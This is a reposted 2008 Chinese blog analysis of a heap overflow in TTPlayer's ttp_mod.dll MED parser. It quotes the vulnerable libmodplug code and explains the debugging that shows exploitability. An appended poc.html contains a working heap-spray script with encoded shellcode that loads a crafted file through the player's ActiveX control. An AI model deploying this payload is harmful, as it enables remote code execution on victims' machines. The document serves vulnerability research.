千千静听ttp_mod.dll解析med文件堆溢出的利用分析_导航已取消

最新推荐文章于 2024-09-25 17:20:24 发布
最新推荐文章于 2024-09-25 17:20:24 发布
阅读量1.5k 收藏
点赞数
文章标签: 测试 c comments crash function dos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chief1985/article/details/3016218
版权
导读:

千千静听ttp_mod.dll解析med文件堆溢出的利用分析
---------------------------------------------------------------------------
Author: void[at]ph4nt0m[dot]org
Blog:   http://hi.baidu.com/54nop
Date:   2008-03-31


    这个洞是dummy牛发现的,当时我只是看了有问题的源码就觉得最多DoS,没有去实际测试分析,惭愧.没想到dummy牛利用成功.这里事后分析一下:-)


    千千静听ttp_mod.dll用的是开源代码,源代码链接:  
    http://gstreamer.freedesktop.org/src/gst-plugins/gst-plugins-0.8.3.tar.gz


    出问题的源代码是gst-plugins-0.8.3/gst/modplug/libmodplug/load_med.cpp里的:


698   // Song Comments
699   UINT annotxt = bswapBE32(pmex->annotxt);
700   UINT annolen = bswapBE32(pmex->annolen);
701   if ((annotxt) && (annolen) && (annotxt+annolen <= dwMemLength))
702   {
703    m_lpszSongComments = new char[annolen+1];
704    memcpy(m_lpszSongComments, lpStream+annotxt, annolen);
705    m_lpszSongComments[annolen] = 0;
706   }


    这是个很典型的整数溢出.annolen为0xFFFFFFFF(即有符号整数-1)时,导致703行new char[0],有趣的是这个0字节分配居然成功返回(测试见注[1]),所以即使703行后加上类似if(m_lpszSongComments){...}的检查代码,也无济于事.
        




    704行进行memcpy,因为annolen为0xFFFFFFFF,毫无疑问导致了堆溢出,触发内存读/写越界异常.
这里更有意思:
    用od开启ie,载入poc.html(见注[2]),test.mod构造详见dummy的文章.
    当ttp_mod.dll在memcpy触发越界异常后,打开SEH链窗口,将ttpctrl.dll的所有异常处理例程F2断下,Shift+F9忽略异常继续.




    在ttpctrl.04EE73F1暂停,进入了CxxFrameHandler异常处理流程,F9继续运行,可以看到这个异常被千千静听处理掉了!这里很关键,直接导致后续的虚函数指针覆盖和HeapSpray利用的可能.如果异常处理例程都不进行处理,只能导致Crash!




    最后,shellcode运行,突然弹出来一个窗口,很黄很暴力,我赶紧把它给关了.
    



    除了这个load_med.cpp有问题外,这个源码包好几处都存在类似问题,有兴趣的可以看看.



注释:
注[1]:
malloc(0)的行为: http://c-faq-chn.sourceforge.net/ccfaq/node181.html
关于new char[0]堆分配的测试代码:


---[Cut Below]------------------------------------------------------------------------
#include
void main()
{
int len=0, i=0;
char* p;
len = -1;
p = new char[len];
printf("alloc 0x%08X Bytes at %p/n", len, new char[len]);


len = 0;
p = new char[len];
printf("alloc 0x%08X Bytes at %p/n", len, new char[len]);
while(1)
{
   p[i++] = 'A';
}
}
---[Cut Above]------------------------------------------------------------------------



注[2]:
poc.html代码


---[Cut Below]------------------------------------------------------------------------


<script >
var heapSprayToAddress = 0x0c0c0c0c;
var shellcode = unescape("%u0eeb%u4b5b%uc933%uc6b1%u3480%ufe0b%ufae2%u05eb%uede8%uffff%u17ff%ufe5d%ufefe%u94a1%ua7ce%u759a%u75ff%uf2be%u8e75%u53e2%u9675%u75f6%u9409%ua7fc%ubd16%ufefe%u1cfe%u9607%ucccd%ufefe%u8b96%u9b8d%uaa8c%ue801%u166b%ufed0%ufefe%u96ac%u8c91%ufe99%u9a96%u8a91%u96a3%uce8a%ua593%u8e96%uca96%u9690%u9fa5%ua38a%u8896%u9791%u759a%u7322%uf2b8%uadac%uacae%ua801%u01f6%ufaa8%ua8af%u8b75%u75c2%ud08a%ufd86%ua80b%u8875%ufdde%ucd0b%ub737%u53bf%u3bfd%u25cd%u40f1%uc4ee%u8a28%u3ff6%uf935%u24fd%u15be%uc50f%u8be1%ua019%ua075%ufdda%u9823%uf275%u75b5%ue2a0%u23fd%ufa75%ufd75%u553b%ua7a0%u163d%u01a6%u0101%u8acc%uf26f%u779d%ub12f%uf494%ue0c6%u2244%u3845%u44d2%u4f22%u3f57%udf58%u00fe");
var heapBlockSize = 0x100000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u0c0c%u0c0c");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;
memory = new Array();
for (i=0;i
{
memory[i] = spraySlide + shellcode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2
{
      spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
//ttp.URL="c://test.mod";
//ttp.URL=" http://192.168.0.100/test.mod";
//ttp.controls.play();
setTimeout('ttp.URL="c:/test.mod";ttp.controls.play();',1000);
//setTimeout('ttp.openURL(" http://192.168.0.100/test.mod");ttp.controls.play();',1000);
</script>
---[Cut Above]------------------------------------------------------------------------



本文转自
http://hi.baidu.com/54nop/blog/item/dcf75ef38ae295cf0b46e043.html
chief1985
关注
ActiveX控件漏洞学习
爱杀之爪的矩阵
11-23 1765
<br />以后可能会一直搞这方面了,挺有意思的,今天在看雪找到了ExploitMe玩了下(08年的ExploitMe大赛的题目)<br />题目A很简单,简单的栈溢出就搞定了,题目B用到了ActiveX控件,基本没接触过,仔细学习了下<br /> <br />注册表查看ActiveX控件<br />HKEY_LOCAL_MACHINE/SOFTWARE/Classes/TypeLib/{7F5E27C1-4A5C-11D3-9232-0000B48A05B2}<br /> <br /> <br />//一
gen_lyricist.dll
01-29
gen_lyricist.dll 万能播放器仿千千静听
初探ActiveX类型溢出---PPlive 0Day
jahn的专栏
10-24 534
影响版本:pplive 1.8beat2有问题的dll:MngModule.dll 1.7.0.2未影响版本:还没吧。:-)分析:以下是在luoluo的协助下分析的,基本属于luoluo语录。:)给出分析过程,给和我一样刚接触溢出一点漏洞分析的思路。MngModule StartupStartupLock Reference 1Lock Reference 2Unlock Reference
软件漏洞分析入门
热门推荐
whatday的专栏
09-23 1万+
1 引子 To be the apostrophe which changed “Impossible” into “I’m possible” —— failwest 凉风有讯,秋月无边。 您是否梦想过能够像电影上演的那样黑进任意一台机器远程操控?您的梦想是否曾经被书店里边满架子的反黑,防毒,擒木马的扫盲书强暴的体无完肤? 从今天开始,准备陆续发一系列关于软件漏洞方面基础知识的帖子,包括软件漏洞...
解析WINDOWS中的DLL文件---经典DLL解读
s_156的博客
04-22 4177
在Windows世界中,有无数块活动的大陆,它们都有一个共同的名字——动态链接库。现在就走进这些神奇的活动大陆,找出它们隐藏已久的秘密吧!    初窥门径:Windows的基石   随便打开一个系统目录,一眼望去就能看到很多扩展名DLL文件,这些就是经常说的“动态链接库”,DLL是Dynamic Link Library(即“动态链接库”)的缩写。从Microsoft公司推出首个版本的Windows以来,动态链接库就一直是这个操作系统的基础。   1...
window中的DLL和linux中的os文件是什么东西
专注基础架构领域
04-26 2641
原文地址:https://blog.csdn.net/hao707822882/article/details/40002583 Windows世界中,有无数块活动的大陆,它们都有一个共同的名字——动态链接库。现在就走进这些神奇的活动大陆,找出它们隐藏已久的秘密吧!   初窥门径:Windows的基石   随便打开一个系统目录,一眼望去就能看到很多扩展名DLL的文...
千千静听 med 文件格式溢出利用
04-15 954
作 者: dummy时 间: 2008-03-30,11:21链 接: http://bbs.pediy.com/showthread.php?t=62200上个月看的洞,昨天晚上又重新翻看了一下这个洞,终于看到了成功利用的可能性。远程和本地攻击最后都可以,本地攻击成功比较低一些,头疼。详细的利用代码不贴了,详细可以看看 libmod 的源码下面是远程部分 poc, 2个关键 DWORD 值隐藏了
千千静听 med 文件格式溢出
不只为记载更为传播
08-26 586
 下面是构造问题文件的代码,最后是使用最新版本千千静听的 ax 写的 poc.   /*   libmodplug v0.8   load_med.cpp   BOOL CSoundFile::ReadMed(const BYTE *lpStream, DWORD dwMemLength)   line 670: memcpy(m_lpszSongComments, lpStream+annotx
VB.rar_vb 播放器_visual basic_xpstylemenu.o_播放器
09-14
在压缩包内的"VB显歌词仿千千静听播放器源码"文件,可能包含了整个项目的源代码文件,包括主程序、音频处理模块、歌词解析模块、用户界面设计等部分。开发者可以通过阅读这些源码,了解如何在VB中实现以下功能: 1....
java_ttplayer_src.rar_java_ttplayer_src
09-19
【标题】"java_ttplayer_src.rar_java_ttplayer_src" 提示我们这是一个与Java相关的项目源码,可能是仿造千千静听(一个知名的音频播放器)的实现。这个压缩包可能包含了开发一个类似音乐播放器应用的所有源代码,...
java_ttplayer_src.rar_java ttpilayir_javaTTPlayer
09-14
Java TTPlayer是一个模仿千千静听的音频播放器,它主要使用Java编程语言实现,为用户提供了一种在Java环境中享受音乐的方式。这个项目对于学习Java GUI编程和多媒体处理技术非常有帮助,因为它的外观设计得相当不错...
java_ttplayer_src.rar_java 酒店管理系统_java 播放_界面_音乐播放器
09-20
Java_ttplayer_src.rar 是一个包含了Java编程语言实现的音乐播放器项目,主要目的是模拟千千静听这款知名的音乐播放软件。这个项目对于学习Java GUI设计和音频处理的开发者来说,是一个很好的实例研究。 首先,我们...
千千静听 med 文件格式溢出的成功利用 | 鬼仔????s Blog
xu的blog
10-04 1091
导读: 上个月看的洞,昨天晚上又重新翻看了一下这个洞,终于看到了成功利用的可能性。远程和本地攻击最后都可以,本地攻击成功比较低一些,头疼。详细的利用代码不贴了,详细可以看看 libmod 的源码下面是远程部分 poc, 2个关键 DWORD 值隐藏了.代码:/*libmodplug v0.8load_med.cppBOOL CSoundFile::ReadMed(const BYTE
Tencent QQ 多个远程溢出漏洞
01-27 1944
by axis(axis_at_ph4nt0m.org) http://www.ph4nt0m.org 摘要: QQ是由Tencent公司开发的一个IM软件,在中国有着非常广泛的用户。DSW Avert在200612.31发现了QQ的几个0day漏洞,并通知了QQ官方。QQ在2007.1.1进行了升级。事实上,在此之前,幻影旅团(ph4nt0m)的axis就已经发现了这些漏洞,出于一些原因未曾公布
python+requests接口测试(tonken)
最新发布
AgostoDu的博客
09-25 1005
登录接口参数:{"username":"admin","password":"e6WGOz+g/FuR646O7IF8JrlC6qH/anCI9/0UCsVDnUxN2aBdGKtRffNb1W7i87dRavZCNyP9yqvAcXLgdKtsRA==","code":"8888","uuid":"{{uuid}}"}网站:http://shop.duoceshi.com/login?第二个接口:登录接口:http://manage.duoceshi.com/auth/login。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值